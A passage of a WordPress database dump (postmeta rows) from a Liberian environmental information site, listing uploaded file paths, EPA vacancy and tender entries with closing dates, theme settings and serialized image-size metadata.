'kava_extra_audio_loop','false'),(32935,4712,'kava_extra_audio_autoplay','false'),(32936,4712,'kava_extra_audio_preload','false'),(32937,4712,'video_tab',''),(32938,4712,'kava_extra_video_type','library'),(32939,4712,'kava_extra_video_library',''),(32940,4712,'kava_extra_video_external',''),(32941,4712,'kava_extra_video_poster',''),(32942,4712,'kava_extra_video_width','770'),(32943,4712,'kava_extra_video_height','480'),(32944,4712,'kava_extra_video_loop','false'),(32945,4712,'kava_extra_video_autoplay','false'),(32946,4712,'kava_extra_video_preload','false'),(32947,4716,'_wp_attached_file','2022/05/Consultancy-Service-for-Design.pdf'),(32948,4717,'_last_editor_used_jetpack','classic-editor'),(32949,4717,'_edit_lock','1652886087:42'),(32950,4717,'_edit_last','42'),(32951,4717,'_wp_page_template','default'),(32952,4717,'_wp_old_date','2022-05-18'),(32953,4717,'closed_date','2022-05-14'),(32954,4717,'owner','EPA'),(32955,4717,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/05/Consultancy-Service-for-Design.pdf'),(32956,4719,'_last_editor_used_jetpack','classic-editor'),(32957,4719,'_edit_lock','1652969690:42'),(32958,4719,'_edit_last','42'),(32959,4720,'_wp_attached_file','2022/05/Samuels-for-posting.pdf'),(32960,4719,'_wp_page_template','default'),(32961,4719,'_wp_old_date','2022-05-19'),(32962,4719,'closed_date','2022-05-24'),(32963,4719,'owner','EPA'),(32964,4719,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/05/Samuels-for-posting.pdf'),(32965,4722,'_edit_lock','1652970277:42'),(32966,4722,'_last_editor_used_jetpack','block-editor'),(32967,4723,'_wp_attached_file','2022/05/ESIA.png'),(32968,4723,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:16:\"2022/05/ESIA.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"ESIA-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"ESIA-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"ESIA-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"ESIA-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:15:\"ESIA-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:16:\"ESIA-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:16:\"ESIA-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:16:\"ESIA-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:16:\"ESIA-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:16:\"ESIA-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:16:\"ESIA-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32971,4722,'_thumbnail_id','4723'),(32972,4722,'_edit_last','42'),(32973,4722,'kava_extra_enable_breadcrumbs','inherit'),(32974,4722,'post_formats',''),(32975,4722,'gallery_tab',''),(32976,4722,'kava_extra_gallery_images',''),(32977,4722,'link_tab',''),(32978,4722,'kava_extra_link',''),(32979,4722,'kava_extra_link_target','_blank'),(32980,4722,'quote_tab',''),(32981,4722,'kava_extra_quote_text',''),(32982,4722,'kava_extra_quote_cite',''),(32983,4722,'audio_tab',''),(32984,4722,'kava_extra_audio',''),(32985,4722,'kava_extra_audio_loop','false'),(32986,4722,'kava_extra_audio_autoplay','false'),(32987,4722,'kava_extra_audio_preload','false'),(32988,4722,'video_tab',''),(32989,4722,'kava_extra_video_type','library'),(32990,4722,'kava_extra_video_library',''),(32991,4722,'kava_extra_video_external',''),(32992,4722,'kava_extra_video_poster',''),(32993,4722,'kava_extra_video_width','770'),(32994,4722,'kava_extra_video_height','480'),(32995,4722,'kava_extra_video_loop','false'),(32996,4722,'kava_extra_video_autoplay','false'),(32997,4722,'kava_extra_video_preload','false'),(32998,2063,'_last_editor_used_jetpack','classic-editor'),(32999,2063,'_wp_page_template','default'),(33000,2063,'_pods_document_cover_image','a:1:{i:0;i:1686;}'),(33001,2063,'document_cover_image','1686'),(33002,2063,'attached_document','2064'),(33003,4729,'_last_editor_used_jetpack','classic-editor'),(33004,4729,'_edit_lock','1653926733:42'),(33005,4730,'_wp_attached_file','2022/05/ToR-plastics-innovation-challenge-Grant.docx'),(33006,4731,'_wp_attached_file','2022/05/Updated-ToR-NBR.docx'),(33007,4729,'_edit_last','42'),(33008,4729,'_wp_page_template','default'),(33009,4729,'closed_date','2022-06-13'),(33010,4729,'owner','EPA'),(33011,4729,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/05/Updated-ToR-NBR.docx'),(33012,4733,'_last_editor_used_jetpack','classic-editor'),(33013,4733,'_edit_lock','1653928219:42'),(33014,4733,'_edit_last','42'),(33015,4733,'_wp_page_template','default'),(33016,4733,'closed_date','2022-06-13'),(33017,4733,'owner','EPA'),(33018,4733,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/05/ToR-plastics-innovation-challenge-Grant.docx'),(33063,4738,'_last_editor_used_jetpack','classic-editor'),(33064,4738,'_edit_lock','1655891201:42'),(33065,4738,'_edit_last','42'),(33066,4739,'_wp_attached_file','2022/06/TOR-for-Monitoring-Evaluation-Officer-final-draft-Randa-Reviewed.pdf'),(33067,4738,'_wp_page_template','default'),(33068,4738,'closed_date','2022-07-11'),(33069,4738,'owner','EPA'),(33070,4738,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2022/06/TOR-for-Monitoring-Evaluation-Officer-final-draft-Randa-Reviewed.pdf'),(33071,4741,'_edit_lock','1655893232:42'),(33072,4741,'_last_editor_used_jetpack','block-editor'),(33073,4742,'_wp_attached_file','2022/06/meeting.png'),(33074,4742,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:19:\"2022/06/meeting.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"meeting-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"meeting-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"meeting-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"meeting-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:18:\"meeting-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:19:\"meeting-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:19:\"meeting-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:19:\"meeting-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:19:\"meeting-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:19:\"meeting-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:19:\"meeting-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33077,4741,'_wp_old_date','2022-06-22'),(33078,4741,'_thumbnail_id','4742'),(33079,4741,'_edit_last','42'),(33080,4741,'kava_extra_enable_breadcrumbs','inherit'),(33081,4741,'post_formats',''),(33082,4741,'gallery_tab',''),(33083,4741,'kava_extra_gallery_images',''),(33084,4741,'link_tab',''),(33085,4741,'kava_extra_link',''),(33086,4741,'kava_extra_link_target','_blank'),(33087,4741,'quote_tab',''),(33088,4741,'kava_extra_quote_text',''),(33089,4741,'kava_extra_quote_cite',''),(33090,4741,'audio_tab',''),(33091,4741,'kava_extra_audio',''),(33092,4741,'kava_extra_audio_loop','false'),(33093,4741,'kava_extra_audio_autoplay','false'),(33094,4741,'kava_extra_audio_preload','false'),(33095,4741,'video_tab',''),(33096,4741,'kava_extra_video_type','library'),(33097,4741,'kava_extra_video_library',''),(33098,4741,'kava_extra_video_external',''),(33099,4741,'kava_extra_video_poster',''),(33100,4741,'kava_extra_video_width','770'),(33101,4741,'kava_extra_video_height','480'),(33102,4741,'kava_extra_video_loop','false'),(33103,4741,'kava_extra_video_autoplay','false'),(33104,4741,'kava_extra_video_preload','false'),(33105,4744,'_edit_lock','1655894037:42'),(33106,4744,'_last_editor_used_jetpack','block-editor'),(33107,4745,'_wp_attached_file','2022/06/validation-.png'),(33108,4745,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:23:\"2022/06/validation-.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"validation--300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"validation--150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"validation--768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"validation--370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:22:\"validation--150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:23:\"validation--230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:23:\"validation--400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:23:\"validation--370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:23:\"validation--570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:23:\"validation--600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:23:\"validation--640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33111,4744,'_wp_old_date','2022-06-22'),(33112,4744,'_thumbnail_id','4745'),(33113,4744,'_edit_last','42'),(33114,4744,'kava_extra_enable_breadcrumbs','inherit'),(33115,4744,'post_formats',''),(33116,4744,'gallery_tab',''),(33117,4744,'kava_extra_gallery_images',''),(33118,4744,'link_tab',''),(33119,4744,'kava_extra_link',''),(33120,4744,'kava_extra_link_target','_blank'),(33121,4744,'quote_tab',''),(33122,4744,'kava_extra_quote_text',''),(33123,4744,'kava_extra_quote_cite',''),(33124,4744,'audio_tab',''),(33125,4744,'kava_extra_audio',''),(33126,4744,'kava_extra_audio_loop','false'),(33127,4744,'kava_extra_audio_autoplay','false'),(33128,4744,'kava_extra_audio_preload','false'),(33129,4744,'video_tab',''),(33130,4744,'kava_extra_video_type','library'),(33131,4744,'kava_extra_video_library',''),(33132,4744,'kava_extra_video_external',''),(33133,4744,'kava_extra_video_poster',''),(33134,4744,'kava_extra_video_width','770'),(33135,4744,'kava_extra_video_height','480'),(33136,4744,'kava_extra_video_loop','false'),(33137,4744,'kava_extra_video_autoplay','false'),(33138,4744,'kava_extra_video_preload','false'),(33139,4747,'_edit_lock','1655894653:42'),(33140,4747,'_last_editor_used_jetpack','block-editor'),(33141,4748,'_wp_attached_file','2022/06/CI-and-EPA.png'),(33142,4748,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:22:\"2022/06/CI-and-EPA.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"CI-and-EPA-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"CI-and-EPA-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"CI-and-EPA-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"CI-and-EPA-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:21:\"CI-and-EPA-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:22:\"CI-and-EPA-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:22:\"CI-and-EPA-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:22:\"CI-and-EPA-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:22:\"CI-and-EPA-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:22:\"CI-and-EPA-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:22:\"CI-and-EPA-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33145,4747,'_wp_old_date','2022-06-22'),(33146,4747,'_thumbnail_id','4748'),(33147,4747,'_edit_last','42'),(33148,4747,'kava_extra_enable_breadcrumbs','inherit'),(33149,4747,'post_formats',''),(33150,4747,'gallery_tab',''),(33151,4747,'kava_extra_gallery_images',''),(33152,4747,'link_tab',''),(33153,4747,'kava_extra_link',''),(33154,4747,'kava_extra_link_target','_blank'),(33155,4747,'quote_tab',''),(33156,4747,'kava_extra_quote_text',''),(33157,4747,'kava_extra_quote_cite',''),(33158,4747,'audio_tab',''),(33159,4747,'kava_extra_audio',''),(33160,4747,'kava_extra_audio_loop','false'),(33161,4747,'kava_extra_audio_autoplay','false'),(33162,4747,'kava_extra_audio_preload','false'),(33163,4747,'video_tab',''),(33164,4747,'kava_extra_video_type','library'),(33165,4747,'kava_extra_video_library',''),(33166,4747,'kava_extra_video_external',''),(33167,4747,'kava_extra_video_poster',''),(33168,4747,'kava_extra_video_width','770'),(33169,4747,'kava_extra_video_height','480'),(33170,4747,'kava_extra_video_loop','false'),(33171,4747,'kava_extra_video_autoplay','false'),(33172,4747,'kava_extra_video_preload','false'),(33173,4750,'_edit_lock','1655895115:42'),(33174,4750,'_last_editor_used_jetpack','block-editor'),(33175,4751,'_wp_attached_file','2022/06/MME-EPA.png'),(33176,4751,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:19:\"2022/06/MME-EPA.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"MME-EPA-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"MME-EPA-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"MME-EPA-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"MME-EPA-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:18:\"MME-EPA-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:19:\"MME-EPA-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:19:\"MME-EPA-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:19:\"MME-EPA-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:19:\"MME-EPA-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:19:\"MME-EPA-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:19:\"MME-EPA-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33179,4750,'_wp_old_date','2022-06-22'),(33180,4750,'_thumbnail_id','4751'),(33181,4750,'_edit_last','42'),(33182,4750,'kava_extra_enable_breadcrumbs','inherit'),(33183,4750,'post_formats',''),(33184,4750,'gallery_tab',''),(33185,4750,'kava_extra_gallery_images',''),(33186,4750,'link_tab',''),(33187,4750,'kava_extra_link',''),(33188,4750,'kava_extra_link_target','_blank'),(33189,4750,'quote_tab',''),(33190,4750,'kava_extra_quote_text',''),(33191,4750,'kava_extra_quote_cite',''),(33192,4750,'audio_tab',''),(33193,4750,'kava_extra_audio',''),(33194,4750,'kava_extra_audio_loop','false'),(33195,4750,'kava_extra_audio_autoplay','false'),(33196,4750,'kava_extra_audio_preload','false'),(33197,4750,'video_tab',''),(33198,4750,'kava_extra_video_type','library'),(33199,4750,'kava_extra_video_library',''),(33200,4750,'kava_extra_video_external',''),(33201,4750,'kava_extra_video_poster',''),(33202,4750,'kava_extra_video_width','770'),(33203,4750,'kava_extra_video_height','480'),(33204,4750,'kava_extra_video_loop','false'),(33205,4750,'kava_extra_video_autoplay','false'),(33206,4750,'kava_extra_video_preload','false'),(33207,4753,'_edit_lock','1655895459:42'),(33208,4753,'_last_editor_used_jetpack','block-editor'),(33209,4754,'_wp_attached_file','2022/06/awareness.png'),(33210,4754,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:21:\"2022/06/awareness.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"awareness-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"awareness-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"awareness-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"awareness-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:20:\"awareness-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:21:\"awareness-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:21:\"awareness-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:21:\"awareness-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:21:\"awareness-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:21:\"awareness-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:21:\"awareness-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33213,4753,'_wp_old_date','2022-06-22'),(33214,4753,'_thumbnail_id','4754'),(33215,4753,'_edit_last','42'),(33216,4753,'kava_extra_enable_breadcrumbs','inherit'),(33217,4753,'post_formats',''),(33218,4753,'gallery_tab',''),(33219,4753,'kava_extra_gallery_images',''),(33220,4753,'link_tab',''),(33221,4753,'kava_extra_link',''),(33222,4753,'kava_extra_link_target','_blank'),(33223,4753,'quote_tab',''),(33224,4753,'kava_extra_quote_text',''),(33225,4753,'kava_extra_quote_cite',''),(33226,4753,'audio_tab',''),(33227,4753,'kava_extra_audio',''),(33228,4753,'kava_extra_audio_loop','false'),(33229,4753,'kava_extra_audio_autoplay','false'),(33230,4753,'kava_extra_audio_preload','false'),(33231,4753,'video_tab',''),(33232,4753,'kava_extra_video_type','library'),(33233,4753,'kava_extra_video_library',''),(33234,4753,'kava_extra_video_external',''),(33235,4753,'kava_extra_video_poster',''),(33236,4753,'kava_extra_video_width','770'),(33237,4753,'kava_extra_video_height','480'),(33238,4753,'kava_extra_video_loop','false'),(33239,4753,'kava_extra_video_autoplay','false'),(33240,4753,'kava_extra_video_preload','false'),(33241,4756,'_edit_lock','1655895752:42'),(33242,4756,'_last_editor_used_jetpack','block-editor'),(33243,4757,'_wp_attached_file','2022/06/epa.png'),(33244,4757,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2022/06/epa.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"epa-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"epa-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"epa-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"epa-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"epa-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"epa-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"epa-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"epa-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9